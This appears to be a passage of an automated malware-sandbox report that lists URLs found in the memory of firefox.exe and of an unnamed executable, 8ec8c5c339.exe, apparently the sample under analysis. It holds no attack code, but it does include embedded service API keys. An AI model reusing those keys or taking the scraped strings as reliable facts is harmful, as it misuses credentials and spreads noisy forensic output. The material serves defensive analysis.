Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2837667745.00000286321A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2841500368.00000286321A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339527137.00000286321A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2821841158.000002862E033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsInt
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsTre
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drafts.csswg.org/css-lists-3/#ua-stylesheet
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drafts.csswg.org/css-scoping/#slots-in-shadow-tree
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637577931.00000238F6903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637577931.00000238F6903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2911410230.000002863BF68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000023.00000002.3345818206.0000028632403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000023.00000002.3345818206.0000028632403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsm
Source: firefox.exe, 00000023.00000002.3345818206.0000028632403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmr
Source: firefox.exe, 00000023.00000002.3345818206.0000028632403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339527137.0000028632103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000023.00000002.3339527137.0000028632103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000023.00000002.3345818206.0000028632403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsi
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Parent
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Sending
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i#
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.comU
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000018.00000002.2635204415.00000238F4703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsexperiments/screenshots/schema.jsonshims/private-brow
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotshttps://screenshots.firefox.com/
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/1072
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/whatwg/html/issues/8610
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Changes
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#bidi-rendering
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#flow-content-3
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#hidden-elements
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#the-details-and-summary-elements
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#the-hr-element-2
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000023.00000002.3350268483.00000286327C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000023.00000002.3350268483.00000286327C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3350268483.00000286327C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3312278388.000002862F706000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3297087442.000002862E515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://pdf.js/PdfJsDefaultPreferences.sys.mjsM
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637577931.00000238F6903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000018.00000002.2625566496.00000238E76DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F414372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2938979510.0000028621AD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339121279.00000286320B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.comS
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000023.00000002.3317049922.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637577931.00000238F6903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%shttps://email.seznam.cz/newMessageScreen?mail
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637577931.00000238F6903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
